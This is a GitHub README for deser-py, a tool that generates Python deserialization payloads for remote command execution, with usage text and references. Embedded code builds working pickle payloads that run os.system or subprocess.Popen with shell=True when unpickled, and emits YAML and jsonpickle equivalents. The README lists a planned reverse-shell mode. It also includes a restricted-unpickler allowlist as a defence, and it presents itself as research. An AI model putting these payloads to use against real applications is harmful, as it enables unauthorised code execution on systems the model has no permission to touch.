Python Deserialization Payload Generator
https://github.com/klezvirus/deser-py

# deser-py

Deser-py is a script that automatically generates serialized payloads for Python-driven applications which deserialize user-controlled data with one of the following vulnerable modules:

* _pickle, cPickle
* jsonpickle
* yaml, ruamel.yaml

The generated payloads can use either `os.system` or `subprocess.Popen` as the callable that executes a system command on the target (selected with the vector option). When choosing between them, consider that `subprocess.Popen`, being a class, is generally regarded as more reliable than `os.system` for gaining RCE.
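The following is an added example, not deser-py's own code, showing what the two vectors above look like once serialized and why the choice of callable does not matter to a properly restricted loader. The pickle side is built with the standard library and is the part exercised here; the YAML and jsonpickle builders emit the tag forms described in the references at the bottom of this page (`!!python/object/apply:` and `py/reduce`) and are assumptions written from those references rather than verified against the libraries. The command string is a constructed, harmless sample.

```python
import io
import json
import os
import pickle
import pickletools
import subprocess


class SystemPayload:
    """Unpickling calls os.system(command): pickle stores the tuple returned by
    __reduce__ as a GLOBAL (STACK_GLOBAL from protocol 4) naming the callable,
    followed by REDUCE, so the call happens inside pickle.loads() itself."""

    def __init__(self, command):
        self.command = command

    def __reduce__(self):
        return (os.system, (self.command,))


class PopenPayload:
    """Unpickling calls subprocess.Popen(command, ..., shell=True). __reduce__
    only passes positional arguments, so shell=True is supplied by position:
    Popen(args, bufsize, executable, stdin, stdout, stderr, preexec_fn,
    close_fds, shell)."""

    def __init__(self, command):
        self.command = command

    def __reduce__(self):
        return (subprocess.Popen,
                (self.command, -1, None, None, None, None, None, True, True))


VECTORS = {"os": SystemPayload, "subprocess": PopenPayload}
TARGETS = {"os": "os.system", "subprocess": "subprocess.Popen"}


def positional_args(command, vector):
    """Argument list handed to the chosen callable, shared by all three formats."""
    if vector == "os":
        return [command]
    return [command, -1, None, None, None, None, None, True, True]


def build_pickle_payload(command, vector="subprocess", protocol=2):
    """Binary pickle; protocol 2 keeps the classic GLOBAL/REDUCE opcode pair."""
    return pickle.dumps(VECTORS[vector](command), protocol=protocol)


def build_yaml_payload(command, vector="subprocess"):
    """PyYAML tag form (assumed from the PyYAML reference). Only yaml.load with
    the unsafe Loader resolves python/object tags; safe_load rejects them.
    JSON arrays are valid YAML flow sequences, so json.dumps does the quoting."""
    return "!!python/object/apply:%s %s" % (
        TARGETS[vector], json.dumps(positional_args(command, vector)))


def build_jsonpickle_payload(command, vector="subprocess"):
    """jsonpickle py/reduce form (assumed from the jsonpickle reference):
    a function is referenced with py/function, a class with py/type."""
    tag = "py/function" if vector == "os" else "py/type"
    return json.dumps({"py/reduce": [{tag: TARGETS[vector]},
                                     {"py/tuple": positional_args(command, vector)}]})


def opcode_names(data):
    """Opcode names of a pickle stream; a payload shows GLOBAL then REDUCE."""
    return [op.name for op, _arg, _pos in pickletools.genops(data)]


class RestrictedUnpickler(pickle.Unpickler):
    """Defensive side: every GLOBAL/STACK_GLOBAL passes through find_class, so an
    allowlist there stops both vectors regardless of which callable was chosen."""

    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"),
               ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def accepted_by_restricted_unpickler(data):
    """True when the stream loads under the allowlist, False when it is refused."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return False
    return True


if __name__ == "__main__":
    command = "echo deser-py demo"  # constructed sample command, harmless
    for vector in VECTORS:
        blob = build_pickle_payload(command, vector)
        print(vector, "pickle opcodes:", opcode_names(blob))
        print(vector, "yaml:", build_yaml_payload(command, vector))
        print(vector, "jsonpickle:", build_jsonpickle_payload(command, vector))
        print(vector, "accepted by RestrictedUnpickler:",
              accepted_by_restricted_unpickler(blob))
```

Note that the `os.system` pickle names the module `posix` (or `nt`) rather than `os`, because that is where the builtin lives; a denylist keyed on the string `os` would miss it, which is why the loader above allowlists instead.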

This tool was written as part of research on common deserialization issues. For further information, see the following article:

* [The Big Problem of Serialisation](https://klezvirus.github.io/The_Big_Problem_of_Serialisation/)

## Usage

Using deser-py is very straightforward:

```
$ python3 deser-py.py -h
usage: deser-py.py [-h] [-d] [-s] [-v {os,subprocess}] -f {pickle,json,yaml,#}
                   [-c COMMAND]

deser-py - A simple serialization payload generator

optional arguments:
  -h, --help            show this help message and exit
  -d, --debug           Enable debug messages
  -s, --save            Save payload to file
  -v {os,subprocess}, --vector {os,subprocess}
                        Execution vector: os (os.system) or subprocess (subprocess.Popen)
  -f {pickle,json,yaml,#}, --format {pickle,json,yaml,#}
                        Serialization archive format
  -c COMMAND, --command COMMAND
                        Command for the payload
```

## Requirements

In order to use **deser-py**, the jsonpickle and PyYAML modules must be installed:

```
pip install -r requirements.txt
```

## TODO:

* Implement automatic reverse shell mode
* Implement encoding schemes:
  - base64
  - urlencoded
  - others

## References

* [PyYAML - Exploit-DB](https://www.exploit-db.com/docs/47655)
* [Exploiting jsonpickle](https://versprite.com/blog/application-security/into-the-jar-jsonpickle-exploitation/)